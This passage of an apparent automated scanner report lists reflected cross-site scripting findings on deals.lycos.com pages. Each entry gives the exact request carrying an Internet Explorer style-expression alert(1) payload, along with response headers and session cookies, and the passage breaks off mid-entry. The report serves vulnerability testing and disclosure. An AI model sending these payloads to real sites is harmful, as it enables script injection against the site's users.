HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:21:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:21:33 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 77375
1.253. http://deals.lycos.com/deals/category/electronics-142 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/electronics-142
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25015"style%3d"x%3aexpression(alert(1))"9a38289e23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25015"style="x:expression(alert(1))"9a38289e23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/electronics-142?25015"style%3d"x%3aexpression(alert(1))"9a38289e23=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:55:12 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:14 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 81210
1.254. http://deals.lycos.com/deals/category/gaming-and-toys-186 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/gaming-and-toys-186
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9863"style%3d"x%3aexpression(alert(1))"1f2d8a9950d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9863"style="x:expression(alert(1))"1f2d8a9950d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/gaming-and-toys-186?c9863"style%3d"x%3aexpression(alert(1))"1f2d8a9950d=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:54:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:00 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 78449
1.255. http://deals.lycos.com/deals/category/home-and-garden-196 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/home-and-garden-196
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43779"style%3d"x%3aexpression(alert(1))"b2b3b9b99d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43779"style="x:expression(alert(1))"b2b3b9b99d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/home-and-garden-196?43779"style%3d"x%3aexpression(alert(1))"b2b3b9b99d2=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:54:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:54:42 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 76744
1.256. http://deals.lycos.com/deals/category/lcd-tvs-424 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/lcd-tvs-424
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d43f9"style%3d"x%3aexpression(alert(1))"f93cc994d8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d43f9"style="x:expression(alert(1))"f93cc994d8f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/lcd-tvs-424?d43f9"style%3d"x%3aexpression(alert(1))"f93cc994d8f=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:21:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:21:33 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 77805
<title>LCD TVs Deals, LCD TVs Sal ...[SNIP]... <a href="?pn=2&d43f9"style="x:expression(alert(1))"f93cc994d8f=1"> ...[SNIP]...
1.257. http://deals.lycos.com/deals/category/movies-music-books-178 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/movies-music-books-178
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc26"style%3d"x%3aexpression(alert(1))"3a91edf5df2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfc26"style="x:expression(alert(1))"3a91edf5df2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/movies-music-books-178?dfc26"style%3d"x%3aexpression(alert(1))"3a91edf5df2=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:55:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:27 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 76739
1.258. http://deals.lycos.com/deals/category/mp3-players-144 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/mp3-players-144
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53ad7"style%3d"x%3aexpression(alert(1))"1e24dff5a28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 53ad7"style="x:expression(alert(1))"1e24dff5a28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/mp3-players-144?53ad7"style%3d"x%3aexpression(alert(1))"1e24dff5a28=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:21:31 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:21:31 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 76316
1.259. http://deals.lycos.com/deals/category/office-and-supplies-182 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/office-and-supplies-182
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efe58"style%3d"x%3aexpression(alert(1))"08254d1432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as efe58"style="x:expression(alert(1))"08254d1432 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/office-and-supplies-182?efe58"style%3d"x%3aexpression(alert(1))"08254d1432=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:55:20 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:22 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 77239
1.260. http://deals.lycos.com/deals/category/pc-computers-47 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/pc-computers-47
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8d02"style%3d"x%3aexpression(alert(1))"d5642dc9aea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8d02"style="x:expression(alert(1))"d5642dc9aea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/pc-computers-47?f8d02"style%3d"x%3aexpression(alert(1))"d5642dc9aea=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:21:31 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:21:32 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 77092
<title>PC Computers Deals, PC Com ...[SNIP]... <a href="?pn=2&f8d02"style="x:expression(alert(1))"d5642dc9aea=1"> ...[SNIP]...
1.261. http://deals.lycos.com/deals/category/sports-and-fitness-211 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/sports-and-fitness-211
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 405f6"style%3d"x%3aexpression(alert(1))"d91b7e01036 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 405f6"style="x:expression(alert(1))"d91b7e01036 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/sports-and-fitness-211?405f6"style%3d"x%3aexpression(alert(1))"d91b7e01036=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:55:31 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:31 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 75271
<title>Sports & Fitness Deals ...[SNIP]... <a href="?pn=2&405f6"style="x:expression(alert(1))"d91b7e01036=1"> ...[SNIP]...
1.262. http://deals.lycos.com/deals/category/televisions-159 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/televisions-159
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b2c"style%3d"x%3aexpression(alert(1))"4b1d9044497 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56b2c"style="x:expression(alert(1))"4b1d9044497 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/televisions-159?56b2c"style%3d"x%3aexpression(alert(1))"4b1d9044497=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:55:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:25 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 77288
1.263. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/travel-and-entertainment-206
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce857"style%3d"x%3aexpression(alert(1))"4eb2c487c66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce857"style="x:expression(alert(1))"4eb2c487c66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/travel-and-entertainment-206?ce857"style%3d"x%3aexpression(alert(1))"4eb2c487c66=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:55:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:27 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 75364
<title>Travel & Entertainment ...[SNIP]... <a href="?pn=2&ce857"style="x:expression(alert(1))"4eb2c487c66=1"> ...[SNIP]...
1.264. http://deals.lycos.com/deals/stores/buy-com-233 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/stores/buy-com-233
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7777"style%3d"x%3aexpression(alert(1))"0aae570a8e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7777"style="x:expression(alert(1))"0aae570a8e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/buy-com-233?b7777"style%3d"x%3aexpression(alert(1))"0aae570a8e2=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:55:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:39 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 76356
<title>Buy.com Deals, Buy.com Sal ...[SNIP]... <a href="?pn=2&b7777"style="x:expression(alert(1))"0aae570a8e2=1"> ...[SNIP]...
1.265. http://deals.lycos.com/deals/stores/ebay-50 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/stores/ebay-50
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 950e9"style%3d"x%3aexpression(alert(1))"0396bb4ae4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 950e9"style="x:expression(alert(1))"0396bb4ae4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/ebay-50?950e9"style%3d"x%3aexpression(alert(1))"0396bb4ae4a=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:56:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:28 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 75658
1.266. http://deals.lycos.com/deals/stores/mwave-521 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/stores/mwave-521
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16584"style%3d"x%3aexpression(alert(1))"c07f1c3e4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16584"style="x:expression(alert(1))"c07f1c3e4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/mwave-521?16584"style%3d"x%3aexpression(alert(1))"c07f1c3e4f=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:56:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:28 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 75096
1.267. http://deals.lycos.com/deals/stores/tigerdirect-597 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/stores/tigerdirect-597
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5d02"style%3d"x%3aexpression(alert(1))"b40fd06c19d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5d02"style="x:expression(alert(1))"b40fd06c19d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
